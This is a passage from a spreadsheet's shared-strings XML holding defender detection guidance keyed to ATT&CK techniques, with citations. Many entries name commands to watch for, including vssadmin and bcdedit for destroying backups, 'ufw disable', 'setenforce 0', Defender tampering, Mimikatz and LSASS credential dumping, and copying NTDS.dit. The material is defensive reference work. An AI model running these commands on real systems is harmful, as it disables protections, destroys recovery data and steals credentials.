    <t>Monitor executed commands and arguments for actions that could be taken to gather common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.</t>
  </si>
  <si>
    <t>Monitor commands and arguments executed by container services. In Docker, the daemon log provides insight into events at the daemon and container service level. Kubernetes system component logs may also detect activities running in and out of containers in the cluster.</t>
  </si>
  <si>
    <t>When executed from the command line or clicked, control.exe will execute the CPL file (ex: &lt;code&gt;control.exe file.cpl&lt;/code&gt;) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that are associated with account creation, such as net user or useradd</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments to detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)</t>
  </si>
  <si>
    <t>Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques.</t>
  </si>
  <si>
    <t>While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor executed commands and arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may search for common password storage locations to obtain user credentials.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may search the Registry on compromised systems for insecurely stored credentials.</t>
  </si>
  <si>
    <t>Monitor executed atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All at jobs are stored in /var/spool/cron/atjobs/.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for binaries that could be involved in data destruction activity, such as SDelete.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may search and collect local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to collect files from a system's connected removable media. For example, data may be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may employ various means to detect and avoid debugged environments. Detecting actions related to debugger identification may be difficult depending on the adversary's implementation and monitoring required.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), auditpol, sc stop EventLog, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and Invoke-Phant0m) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments associated with disabling or the modification of system firewalls such as &lt;code&gt;netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes&lt;/code&gt;,&lt;code&gt;ufw disable&lt;/code&gt;, and &lt;code&gt;ufw logging off&lt;/code&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for the execution of commands and arguments associated with disabling or modification of security software processes or services such as &lt;code&gt;Set-MpPreference-DisableScriptScanning 1&lt;/code&gt; in Windows,&lt;code&gt;sudo spctl --master-disable&lt;/code&gt; in macOS, and &lt;code&gt;setenforce 0&lt;/code&gt; in Linux. Furthermore, on Windows monitor for the execution of taskkill.exe or Net Stop commands which may deactivate antivirus software and other security systems. </t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Monitor for execution of commands and arguments associated with enumeration or information gathering of domain accounts and groups, such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt;, &lt;code&gt;dscacheutil -q group&lt;/code&gt;on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add /domain.</t>
  </si>
  <si>
    <t>Monitor for executed commands and arguments that may attempt to find domain-level groups and permission settings.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes &lt;code&gt;Set federation settings on domain&lt;/code&gt; and &lt;code&gt;Set domain authentication&lt;/code&gt;.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to gather system and network information, such as nltest /domain_trusts. Remote access tools with built-in features may interact directly with the Windows API to gather information.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that updates domain authentication from Managed to Federated via ActionTypes &lt;code&gt;Set federation settings on domain&lt;/code&gt; and &lt;code&gt;Set domain authentication&lt;/code&gt;.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) Monitor for PowerShell commands such as: &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name"&lt;/code&gt;, or &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name" –supportmultipledomain&lt;/code&gt;.(Citation: Microsoft - Update or Repair Federated domain)</t>
  </si>
  <si>
    <t>Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: &lt;code&gt;powershell –v 2&lt;/code&gt;).</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments associated with modifications to variables and files associated with loading shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.</t>
  </si>
  <si>
    <t>Monitor for execution of commands and arguments associated with enumeration or information gathering of email addresses and accounts such as &lt;code&gt;Get-AddressList&lt;/code&gt;, &lt;code&gt;Get-GlobalAddressList&lt;/code&gt;, and &lt;code&gt;Get-OfflineAddressBook&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor executed processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>On Windows systems, monitor for creation of suspicious inbox rules through the use of the &lt;code&gt;New-InboxRule&lt;/code&gt; and &lt;code&gt;Set-InboxRule&lt;/code&gt; PowerShell cmdlets.(Citation: Microsoft BEC Campaign)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond).</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gather the victim's physical location(s) that can be used during targeting. Detecting the use of environmental keying may be difficult depending on the implementation.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gather information about the victim's business relationships that can be used during targeting. Detecting the use of guardrails may be difficult depending on the implementation.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to exfiltrate data over Bluetooth rather than the command and control channel.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may steal data by exfiltrating it over an existing command and control channel.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to exfiltrate data over a different network medium than the command and control channel</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to exfiltrate data via a physical medium, such as a removable drive.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to exfiltrate data over a USB connected physical device.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may exfiltrate data to a cloud storage service rather than over their primary command and control channel.</t>
  </si>
  <si>
    <t>Monitor executed command and arguments that may exfiltrate data to a code repository rather than over their primary command and control channel.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be utilized to unlink, rename, or delete files.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.</t>
  </si>
  <si>
    <t>Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments, such as requests for credentials and/or strings related to creating password prompts that may be malicious.(Citation: Spoofing credential dialogs)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. </t>
  </si>
  <si>
    <t>Monitor for suspicious use of &lt;code&gt;gpresult&lt;/code&gt;. Monitor for the use of PowerShell functions such as &lt;code&gt;Get-DomainGPO&lt;/code&gt; and &lt;code&gt;Get-DomainGPOLocalGroup&lt;/code&gt; and processes spawning with command-line arguments containing &lt;code&gt;GPOLocalGroup&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may search for SYSVOL data and/or GPP XML files, especially on compromised domain controllers.</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading ".” and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that could be taken to add a new user and subsequently hide it from login screens.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may use hidden windows to conceal malicious activity from the plain sight of users. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may execute their own malicious payloads by hijacking the way operating systems run programs.</t>
  </si>
  <si>
    <t>Monitor execution and command-line arguments of &lt;code&gt;AppCmd.exe&lt;/code&gt;, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers.</t>
  </si>
  <si>
    <t>Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Monitor for modification of PowerShell command history settings through processes being created with &lt;code&gt;-HistorySaveStyle SaveNothing&lt;/code&gt; command-line arguments and use of the PowerShell commands &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt; and &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. For network devices, monitor for missing or inconsistencies in Network Device CLI logging present in AAA logs as well as in specific RADIUS and TACAS+ logs.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to block indicators or events typically captured by sensors from being gathered and analyzed.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor executed commands and arguments to bypass security restrictions that limit the use of command-line interpreters. </t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit.</t>
  </si>
  <si>
    <t>Monitor for commands, such as &lt;code&gt;security add-trusted-cert&lt;/code&gt; (macOS) or &lt;code&gt;certutil -addstore&lt;/code&gt; (Windows), that can be used to install root certificates. A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through &lt;code&gt;authroot.stl&lt;/code&gt;. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may be related to abuse of installer packages, including malicious commands triggered by application installations.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may check for Internet connectivity on compromised systems.</t>
  </si>
  <si>
    <t xml:space="preserve">Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source. Monitor for execution of JXA through &lt;code&gt;osascript&lt;/code&gt; and usage of &lt;code&gt;OSAScript&lt;/code&gt; API that may be related to other suspicious behavior occurring on the system. </t>
  </si>
  <si>
    <t>Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: &lt;code&gt;modprobe&lt;/code&gt;, &lt;code&gt;insmod&lt;/code&gt;, &lt;code&gt;lsmod&lt;/code&gt;, &lt;code&gt;rmmod&lt;/code&gt;, or &lt;code&gt;modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package.
On macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the &lt;code&gt;kext_policy&lt;/code&gt; table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, &lt;code&gt;/var/db/SystemPolicyConfiguration/KextPolicy&lt;/code&gt;.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)</t>
  </si>
  <si>
    <t>Monitor executed commands with arguments that may be used to collect Keychain data from a system to acquire credentials.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by the execution of tainted binaries.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may access to a host may attempt to access Local Security Authority (LSA) secrets. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files</t>
  </si>
  <si>
    <t>Ensure Launch Agent's &lt;code&gt; ProgramArguments &lt;/code&gt; key pointing to executables located in the &lt;code&gt;/tmp&lt;/code&gt; or &lt;code&gt;/shared&lt;/code&gt; folders are in alignment with enterprise policy. Ensure all Launch Agents with the &lt;code&gt;RunAtLoad&lt;/code&gt; key set to &lt;code&gt;true&lt;/code&gt; are in alignment with policy.</t>
  </si>
  <si>
    <t>Some legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the &lt;code&gt;RunAtLoad&lt;/code&gt; parameter set to true, ensure the &lt;code&gt;Program&lt;/code&gt; parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as &lt;code&gt;Program&lt;/code&gt; and &lt;code&gt;ProgramArguments&lt;/code&gt; parameters but one must be present. (Citation: launchd Keywords for plists)</t>
  </si>
  <si>
    <t>Monitor command-line execution of the &lt;code&gt;launchctl&lt;/code&gt; command immediately followed by abnormal network connections.</t>
  </si>
  <si>
    <t>Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include &lt;code&gt;chmod +x&lt;/code&gt;, &lt;code&gt;chmod -R 755&lt;/code&gt;, and &lt;code&gt;chmod 777&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add , useradd , and dscl -create</t>
  </si>
  <si>
    <t>Monitor for execution of commands and arguments associated with enumeration or information gathering of local accounts and groups such as &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net account&lt;/code&gt;, &lt;code&gt;net localgroup&lt;/code&gt;, &lt;code&gt;Get-LocalUser&lt;/code&gt;, and &lt;code&gt; dscl&lt;/code&gt;.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>Monitor for executed commands and arguments that may attempt to find local system groups and permission settings.</t>
  </si>
  <si>
    <t>Monitor executed commands with arguments to install or modify login hooks.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for logon scripts</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gather information about the victim's DNS that can be used during targeting.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to manipulate the name of a task or service to make it appear legitimate or benign.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. (Citation: Twitter ItsReallyNick Masquerading Update)</t>
  </si>
  <si>
    <t>Adversaries may rename abusable binaries to evade detections, but the argument &lt;code&gt;INJECTRUNNING&lt;/code&gt; is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.</t>
  </si>
  <si>
    <t xml:space="preserve"> Monitor executed commands and arguments for actions that could be taken to change, conceal, and/or delete information in the Registry. The Registry may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.</t>
  </si>
  <si>
    <t>Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. Look for command-lines that invoke attempts to access or copy the NTDS.dit.</t>
  </si>
  <si>
    <t>The Streams tool of Sysinternals can be used to uncover files with ADSs. The &lt;code&gt;dir /r&lt;/code&gt; command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a &lt;code&gt;-stream&lt;/code&gt; parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by Netsh Helper DLLs.</t>
  </si>
  <si>
    <t>Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of Windows Admin Shares.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that aid in sniffing network traffic to capture information about an environment, including authentication material passed over the network</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Look for command-lines that invoke AuditD or the Security Accounts Manager (SAM). Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''"'''. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)</t>
  </si>
  <si>
    <t>Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may leverage Microsoft Office-based applications for persistence between startups. Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse Microsoft Office templates to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified PR_RULE_MSG_NAME and PR_RULE_MSG_PROVIDER properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may acquire user credentials from third-party password managers. (Citation: ise Password Manager February 2019)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to gather information about attached peripheral devices and components connected to a computer system.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>Monitor for commands with arguments (such as opening common command-line editors) used to modify plist files, especially commonly abused files such as those in &lt;code&gt;\~/LaunchAgents&lt;/code&gt;, &lt;code&gt;\~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;, and an application's &lt;code&gt;Info.plist&lt;/code&gt;.</t>
  </si>
  <si>
    <t>If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.</t>
  </si>
  <si>
    <t>Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments in command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may search for private key certificate files on compromised systems for insecurely stored credentials.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gather credentials from information stored in the Proc filesystem or &lt;code&gt;/proc&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that may attempt to get information about running processes on a system.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
